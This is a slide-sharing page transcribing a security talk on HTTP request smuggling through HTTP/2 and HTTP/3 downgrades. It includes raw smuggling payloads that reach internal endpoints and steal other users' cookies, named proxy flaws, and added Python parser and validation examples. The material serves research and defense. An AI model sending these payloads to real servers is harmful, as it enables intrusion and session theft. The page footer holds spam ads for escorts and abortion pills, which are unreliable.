HTTP Request Smuggling via higher HTTP versions
Emil Lerner

Emil Lerner
Independent security researcher
CTO at WunderFund.io
Bushwhackers CTF team
@emil_lerner
@neex
HTTP
Client → Server: HTTP Request
Server → Client: HTTP Response
Reverse proxy
Client → Frontend Server: HTTP Request
Frontend Server → Backend Server: HTTP Request
Backend Server → Frontend Server: HTTP Response
Frontend Server → Client: HTTP Response
HTTP keep-alive
Client and Server reuse one connection:
Client → Server: HTTP Request 1
Server → Client: HTTP Response 1
Client → Server: HTTP Request 2
Server → Client: HTTP Response 2
HTTP/1.1 body transfer
Content-Length header:
    Content-Length: 100

    Here goes 100 bytes
    of the request body.

Chunked encoding:
    Transfer-Encoding: chunked

    ff
    Here goes 255-byte chunk
    10
    Another chunk
    0
HTTP keep-alive (to backend)
Client1 connection: Client1 → Frontend Server: HTTP Request 1, HTTP Response 1
Client2 connection: Client2 → Frontend Server: HTTP Request 2, HTTP Response 2
Single backend connection: Frontend Server → Backend Server: HTTP Request 1, HTTP Response 1, HTTP Request 2, HTTP Response 2
HTTP Request Smuggling
Old & known attack
Gained a lot of attention after James Kettle's talk at BH USA 2019
He discovered a lot of new techniques
HTTP Request Smuggling
An attacker sends a malicious request
It is parsed as a single request by the frontend and is forwarded to the backend
The backend parses it as two separate requests
HTTP Request Smuggling
    POST / HTTP/1.1
    Content-Length: 100
    Transfer-Encoding : chunked

    0

    GET /internal HTTP/1.1
    ...
Frontend interprets Content-Length and thinks everything after the headers is body.
Backend interprets Transfer-Encoding: the body ends at the "0" chunk, so it thinks "GET /internal" is another request.
HTTP Request Smuggling
It's all about Content-Length / Transfer-Encoding
Transfer-Encoding has precedence
We need to "smuggle" Transfer-Encoding to the backend unprocessed by the frontend
HTTP Request Smuggling
    POST / HTTP/1.1
    Content-Length: 100
    Transfer-Encoding: identity,
     chunked

    0

    GET /internal HTTP/1.1
    ...
Frontend interprets Content-Length and thinks the rest is body.
Backend interprets the Transfer-Encoding as chunked and thinks "GET /internal" is another request.
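As an added illustration of slides 10 to 12 (and of the chunked framing from slide 6; this is not the speaker's code), the following Python parser frames one constructed HTTP/1.1 byte stream three ways: honouring only Content-Length, giving Transfer-Encoding precedence, and strictly (refusing both headers together, as RFC 7230 section 3.3.3 advises). On a second constructed request it also shows why a chunk-size line with no data behind it leaves a chunked parser waiting, which the first detection idea later in the deck relies on. The request bytes, host.com, the policy names and the helper names are all constructed for this example.

```python
"""How one HTTP/1.1 byte stream is framed under different body-length rules.
Added example for this page, not the speaker's code; all requests below are
constructed. Policies: "content-length" (frontend on slide 10),
"transfer-encoding" (backend, TE takes precedence) and "strict" (refuses the
ambiguity instead of guessing)."""

# RFC 7230 token characters; a field name containing anything else is malformed.
TOKEN_CHARS = frozenset(b"!#$%&'*+-.^_`|~0123456789"
                        b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")

class NeedMoreData(Exception):
    """The framing rules say the message is not finished; a real server keeps waiting."""

def split_head(raw: bytes):
    """Return (request_line, [(raw_name, value)], rest) for the first message in raw."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise NeedMoreData
    lines = head.split(b"\r\n")
    fields = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        fields.append((name, value.strip()))     # raw name kept so strict mode can inspect it
    return lines[0], fields, rest

def read_chunked(data: bytes):
    """Decode chunked transfer coding; return (body, bytes left after the last chunk)."""
    body, pos = b"", 0
    while True:
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            raise NeedMoreData
        size = int(data[pos:eol].split(b";")[0], 16)   # chunk extensions ignored
        pos = eol + 2
        if size == 0:
            break
        if len(data) < pos + size + 2:
            raise NeedMoreData                           # chunk announced, data not here yet
        body += data[pos:pos + size]
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2
    while True:                                          # trailer fields end with an empty line
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            raise NeedMoreData
        line, pos = data[pos:eol], eol + 2
        if not line:
            return body, data[pos:]

def frame_request(raw: bytes, policy: str):
    """Return (request_line, body, leftover); leftover is what this parser would
    treat as the start of the next message on the same connection."""
    request_line, fields, rest = split_head(raw)
    # Lenient lookup: trims and lower-cases names, so "Transfer-Encoding " matches too.
    lenient = {name.strip().lower(): value for name, value in fields}
    content_length = lenient.get(b"content-length")
    transfer_encoding = lenient.get(b"transfer-encoding")
    if policy == "strict":
        if content_length is not None and transfer_encoding is not None:
            raise ValueError("Content-Length and Transfer-Encoding both present")
        for name, _ in fields:
            if not name or any(c not in TOKEN_CHARS for c in name):
                raise ValueError(f"malformed field name {name!r}")
        if transfer_encoding is not None and transfer_encoding.lower() != b"chunked":
            raise ValueError(f"unsupported transfer coding {transfer_encoding!r}")
        policy = "transfer-encoding" if transfer_encoding is not None else "content-length"
    if policy == "transfer-encoding" and transfer_encoding is not None:
        body, leftover = read_chunked(rest)
    else:
        n = int(content_length or b"0")
        if len(rest) < n:
            raise NeedMoreData
        body, leftover = rest[:n], rest[n:]
    return request_line, body, leftover

def request_lines(stream: bytes, policy: str) -> list:
    """Every request line a parser with this policy sees on one keep-alive connection."""
    seen = []
    while stream:
        line, _, stream = frame_request(stream, policy)
        seen.append(line)
    return seen

def outcome(raw: bytes, policy: str) -> str:
    """'complete', 'incomplete' (parser keeps waiting: the hang of detection idea #1) or 'rejected'."""
    try:
        frame_request(raw, policy)
    except NeedMoreData:
        return "incomplete"
    except ValueError:
        return "rejected"
    return "complete"

# Constructed request in the shape of slide 10; the space before the colon is
# what keeps the frontend from recognising Transfer-Encoding.
SMUGGLED = b"GET /internal HTTP/1.1\r\nHost: host.com\r\n\r\n"
BODY = b"0\r\n\r\n" + SMUGGLED
REQUEST = b"".join([b"POST / HTTP/1.1\r\n", b"Host: host.com\r\n",
                    b"Content-Length: %d\r\n" % len(BODY),
                    b"Transfer-Encoding : chunked\r\n", b"\r\n", BODY])
# Constructed probe in the shape of slide 29: "fff" is a chunk-size line with no
# data behind it, so a chunked parser waits while a 5-byte Content-Length is satisfied.
HANG = b"POST / HTTP/1.1\r\nContent-Length: 5\r\nTransfer-Encoding: chunked\r\n\r\nfff\r\n"
```

`request_lines(REQUEST, "content-length")` yields one request line, `request_lines(REQUEST, "transfer-encoding")` yields two, and `outcome(REQUEST, "strict")` is "rejected": the strict parser is the one a proxy should run, since it never has to guess which of the two framings the other side will pick.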
Exploitation
Accessing internal endpoints
Cache poisoning
Stealing other users’ requests
Exploitation: stealing requests
Attacker→Frontend:
    GET / HTTP/1.1
    Transfer-Encoding : chunked
    ...

    POST /save HTTP/1.1
    ...
Victim→Frontend:
    GET / HTTP/1.1
    Cookie: secret
Frontend→Backend:
    GET / HTTP/1.1
    Transfer-Encoding : chunked
    ...

    POST /save HTTP/1.1

    data=GET / HTTP/1.1
    Cookie: secret
Exploitation: stealing requests
The victim's request is appended to ours
Most frameworks are OK with newlines in forms
The victim's cookies are saved to our profile, PMs or other places where we can view them later
HTTP/2 overview
Widely adopted by now
Binary protocol (no special chars)
Almost always terminated at frontend
HTTP/2 termination
Client → Frontend (HTTP/2):
    PRI * HTTP/2.0
    <binary>
    :method GET
Frontend → Backend (HTTP/1.1):
    GET / HTTP/1.1
Backend → Frontend (HTTP/1.1):
    HTTP/1.1 200 OK
Frontend → Client (HTTP/2):
    :status 200
HTTP/2 body transfer
Request body is transferred in binary frames
Content-Length not required, but allowed
Transfer-Encoding: chunked has no effect
Potential bug #1: content-length conflicts with actual length
Client→Frontend:
    :method POST
    :authority host.com
    content-length: 1

    XGET /internal HTTP/1.1
    ...
Frontend→Backend:
    POST / HTTP/1.1
    Host: host.com
    Content-Length: 1

    XGET /internal HTTP/1.1
    ...
The body is longer than the declared length: the backend takes one byte ("X") as the body and reads "GET /internal" as the next request.
Potential bug #2: no content-length forwarding
Client→Frontend:
    :method GET
    :authority host.com

    GET /internal HTTP/1.1
Frontend→Backend:
    GET / HTTP/1.1
    Host: host.com

    GET /internal HTTP/1.1
The DATA frames carried a body, but no Content-Length is added for the backend, which reads the body as a second request.
Potential bug #3: content-length conflicting with transfer-encoding
Client→Frontend:
    :method POST
    :authority host.com
    content-length: 100
    transfer-encoding: chunked

    0

    GET /internal HTTP/1.1
    ...
Frontend→Backend:
    POST / HTTP/1.1
    Host: host.com
    Content-Length: 100
    Transfer-Encoding: chunked

    0

    GET /internal HTTP/1.1
    ...
HTTP/2 header validation
Header names and values are binary strings
Names and values can contain newlines
Names can contain colons
Potential bug #4: newlines in headers
Client→Frontend:
    :method GET
    :authority host.com
    x: ⏎⏎GET /internal HTTP/1.1
    ...
Frontend→Backend:
    GET / HTTP/1.1
    Host: host.com
    X:

    GET /internal HTTP/1.1
    ...
Potential bug(s) #5: less strict validation
Same request as in bug #3, with the transfer-encoding header spelled so that a strict frontend ignores it while a less strict backend still honours it. Three variants from the slides:

Variant 1: space before the colon
Client→Frontend:
    :method POST
    :authority host.com
    content-length: 100
    transfer-encoding : chunked

    0

    GET /internal HTTP/1.1
    ...
Frontend→Backend:
    POST / HTTP/1.1
    Host: host.com
    Content-Length: 100
    transfer-encoding : chunked

    0

    GET /internal HTTP/1.1
    ...

Variant 2: underscore instead of hyphen (otherwise identical to variant 1)
Client→Frontend:
    transfer_encoding: chunked
Frontend→Backend:
    Transfer_Encoding: chunked

Variant 3: unusual letter case in the value (otherwise identical to variant 1)
Client→Frontend:
    transfer-encoding: chunKed
Frontend→Backend:
    Transfer-Encoding: chunKed
What does the RFC say?
RFC 7540 mentions Intermediary Encapsulation Attacks in section 10.3
Basically says "implementation must reject things it can't handle" :)
Explicitly mentions newlines and NUL (\x00)
Detection idea #1: make backend expect more data
Craft a request such that:
the backend expects more data,
the frontend thinks it sent the whole request.
The request will hang
Implemented in James Kettle's Burp plugin (for HTTP/1.1)
Detection idea #1: make backend expect more data
    :method POST
    content-length: 5
    h: ⏎transfer-encoding:chunked

    fff
Frontend interprets content-length: 5 and thinks the body is finished.
Backend interprets transfer-encoding: chunked, reads "fff" as a chunk size, expects more data and hangs.
Detection idea #2: chunked body parsing
Chunked encoding should never be parsed in HTTP/2
If the response depends on the validity of the chunked encoding, it is a possible vulnerability
There are some false positives

Detection idea #2: chunked body parsing
Client → Frontend (HTTP/2):
    :method POST
    transfer-encoding : chunked

    invalid chunked body
Frontend → Backend (HTTP/1.1):
    POST / HTTP/1.1
    transfer-encoding : chunked

    invalid chunked body
Backend → Frontend: HTTP/1.1 400
Frontend → Client: :status 400
Detection idea #3: content-length parsing
Send something like x:x⏎content-length:1000
If the response depends on the value, it's a possible vulnerability
Even more false positives :(
False positive scenario
Client → Frontend: HTTP/2
Frontend: HTTP/2 termination, then HTTP/1 processing inside the same server
Frontend → Backend: HTTP/1.1
The frontend itself already processes the request as HTTP/1, so the response can depend on HTTP/1 framing headers without any frontend/backend desync.
Varnish flaw
Client→Varnish:
    :method GET
    :authority host.com
    content-length: 0

    GET /internal HTTP/1.1
    ...
Varnish→Backend:
    GET / HTTP/1.1
    Host: host.com
    content-length: 0

    GET /internal HTTP/1.1
    ...
Potential bug #6: RFC 8441
Designed for WebSockets over HTTP/2
A client sends the CONNECT method and sets the :protocol special header
The intermediary translates it to Upgrade
Haproxy & nghttp2 flaws
Client→Frontend:
    :method CONNECT
    :authority host.com
    :protocol websocket

    GET /internal HTTP/1.1
    ...
Frontend→Backend:
    GET / HTTP/1.1
    Host: host.com
    Connection: upgrade
    Upgrade: websocket

    GET /internal HTTP/1.1
    ...
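As an added example (not http2smugl and not code from Varnish, Haproxy, nghttp2 or any other proxy named in the deck), the following Python function applies, on the frontend side, the checks that close potential bugs #1 to #5 from the earlier slides and bug #6 from this one before an HTTP/2 request is rewritten as HTTP/1.1; it also refuses a :method that is not a token, which is the :method concern raised on the closing slide. The header lists, host.com, the /chat path, the DowngradeError class and the policy of refusing any body on extended CONNECT are assumptions of the example.

```python
"""Checks a frontend should run on an HTTP/2 request before rewriting it as HTTP/1.1.
Added example for this page; it is not http2smugl and not the code of any proxy named
in the talk. Header lists are modelled as (name, value) byte pairs in arrival order,
roughly what an HPACK decoder hands up. Each rule names the slide's "potential bug" it
closes; the refusal policy for extended CONNECT is an assumption of this example."""
import re

TOKEN = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+\Z")   # RFC 7230 tchar: no space, no colon
CTL = re.compile(rb"[\x00-\x08\x0a-\x1f\x7f]")            # CR, LF, NUL and friends (HTAB kept)
PSEUDO = {b":method", b":scheme", b":authority", b":path", b":protocol"}
CONNECTION_SPECIFIC = {b"transfer-encoding", b"connection", b"upgrade",
                       b"keep-alive", b"proxy-connection"}

class DowngradeError(ValueError):
    """The stream must be refused (400 / RST_STREAM); nothing goes to the backend."""

def canonical(name: bytes) -> bytes:
    """The name as a lenient HTTP/1 backend might read it: trimmed, lower-cased,
    '_' folded to '-'. Used only to decide what to refuse (bug #5)."""
    return name.strip().lower().replace(b"_", b"-")

def downgrade(headers, body: bytes) -> bytes:
    pseudo, regular, seen_regular, declared = {}, [], False, None
    for name, value in headers:
        # Bug #4: a CR, LF or NUL anywhere becomes line structure for the backend.
        if CTL.search(name) or CTL.search(value):
            raise DowngradeError(f"control character in field {name!r}")
        if name.startswith(b":"):
            if name not in PSEUDO or name in pseudo or seen_regular:
                raise DowngradeError(f"bad pseudo-header {name!r}")
            pseudo[name] = value
            continue
        seen_regular = True
        # Names must be lower-case tokens: rejects "transfer-encoding " and "Transfer_Encoding".
        if not TOKEN.match(name) or name != name.lower():
            raise DowngradeError(f"malformed field name {name!r}")
        folded = canonical(name)
        # Bugs #3 and #5: no spelling of transfer-encoding (or any other connection-specific
        # field) is forwarded; HTTP/2 frames the body itself, so the field has no meaning here.
        if folded in CONNECTION_SPECIFIC:
            raise DowngradeError(f"connection-specific field {name!r}")
        if folded == b"content-length":
            # Bug #1: the frontend holds the whole body, so the declared length must match it.
            if name != b"content-length" or not value.isdigit() or declared is not None:
                raise DowngradeError("malformed or repeated content-length")
            declared = int(value)
            continue
        regular.append((name, value))
    if declared is not None and declared != len(body):
        raise DowngradeError(f"content-length {declared} != body length {len(body)}")

    method, authority, path = (pseudo.get(k, b"") for k in (b":method", b":authority", b":path"))
    # ":method GET /internal HTTP/1.1" would rewrite the request line: insist on a token.
    if not TOKEN.match(method):
        raise DowngradeError(f"malformed :method {method!r}")
    if not authority or b" " in authority:
        raise DowngradeError(f"malformed :authority {authority!r}")

    upgrade = []
    if method == b"CONNECT":
        # Bug #6 (RFC 8441): extended CONNECT becomes GET + Upgrade on the wire. DATA forwarded
        # before the backend answers 101 is read by a non-upgrading backend as a new request,
        # so this example refuses any body on extended CONNECT (policy assumed here).
        protocol = pseudo.get(b":protocol")
        if protocol is None or not TOKEN.match(protocol):
            raise DowngradeError("plain CONNECT is not downgraded by this example")
        if body:
            raise DowngradeError("body on extended CONNECT before upgrade")
        method, upgrade = b"GET", [(b"Connection", b"upgrade"), (b"Upgrade", protocol)]
    elif b":protocol" in pseudo:
        raise DowngradeError(":protocol without CONNECT")
    if path != b"*" and (not path.startswith(b"/") or b" " in path):
        raise DowngradeError(f"malformed :path {path!r}")

    lines = [method + b" " + path + b" HTTP/1.1", b"Host: " + authority]
    lines += [n + b": " + v for n, v in regular + upgrade]
    # Bug #2: always state the length actually forwarded, even when the client sent none.
    lines.append(b"Content-Length: %d" % len(body))
    return b"\r\n".join(lines) + b"\r\n\r\n" + body

def rejects(headers, body: bytes) -> bool:
    """True when downgrade() refuses the request."""
    try:
        downgrade(headers, body)
    except DowngradeError:
        return True
    return False
```

A frontend following these rules answers the stream with 400 or RST_STREAM instead of forwarding it. The checks deliberately err toward refusing anything a lenient HTTP/1 backend might frame differently from the frontend, because the frontend cannot know which of the spellings on the bug #5 slides its backend will honour.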
Open problem: one-way size discrepancy
Attacks work if the backend reads less data than the frontend
Detection methods work if the backend expects more data
What if the first is achievable, but the second is not possible?
H2O http3 (QUIC) flaw
Client→Frontend:
    :method POST
    content-length: 100
    x:x⏎transfer-encoding:chunked

    0

    GET /internal HTTP/1.1
    ...
Frontend→Backend:
    POST / HTTP/1.1
    Content-length: 100
    X: x
    Transfer-Encoding: chunked

    0

    GET /internal HTTP/1.1
    ...
Automation
I've implemented the http2smugl tool
It performs automatic vulnerability detection using the discussed methods
It also supports sending "invalid" queries via a custom HTTP/2 implementation
Further research needed
HTTP/1 special headers, writing to closed streams, HPACK and >40 implementations not researched
Stable detection methods wanted
Putting space + path into :method can lead to hitting internal endpoints and Host override
Thank you!
https://github.com/neex/http2smugl

More Related Content

What's hot

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans Rosén
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Aaron Hnatiw
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfVishwas N
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappshacktivity
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesMarco Morana
 

What's hot (20)

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Ssrf
SsrfSsrf
Ssrf
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdf
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Http request smuggling
Http request smugglingHttp request smuggling
Http request smuggling
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery Vulnerabilities
 

Similar to HTTP Request Smuggling via higher HTTP versions

HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0Cory Forsyth
 
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Ontico
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?timbc
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTPBen Ramsey
 
DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksFelipe Prado
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsBen Ramsey
 
Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Navaneethan Naveen
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2Ido Flatow
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersDenis Kolegov
 
Hypertex transfer protocol
Hypertex transfer protocolHypertex transfer protocol
Hypertex transfer protocolwanangwa234
 

Similar to HTTP Request Smuggling via higher HTTP versions (20)

HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
 
Http2 kotlin
Http2   kotlinHttp2   kotlin
Http2 kotlin
 
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
 
Http-protocol
Http-protocolHttp-protocol
Http-protocol
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTP
 
HTTP
HTTPHTTP
HTTP
 
DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacks
 
Appl layer
Appl layerAppl layer
Appl layer
 
HTTP
HTTPHTTP
HTTP
 
Http
HttpHttp
Http
 
HTTP
HTTPHTTP
HTTP
 
Http request&response
Http request&responseHttp request&response
Http request&response
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your Apps
 
Starting With Php
Starting With PhpStarting With Php
Starting With Php
 
applayerslides.ppt
applayerslides.pptapplayerslides.ppt
applayerslides.ppt
 
Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache Headers
 
Hypertex transfer protocol
Hypertex transfer protocolHypertex transfer protocol
Hypertex transfer protocol
 

Recently uploaded

Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfryanfarris8
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park masabamasaba
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112  Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112  Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Nitya salvi
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech studentsHimanshiGarg82
 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdfPearlKirahMaeRagusta1
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...kalichargn70th171
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfproinshot.com
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...Health
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park masabamasaba
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
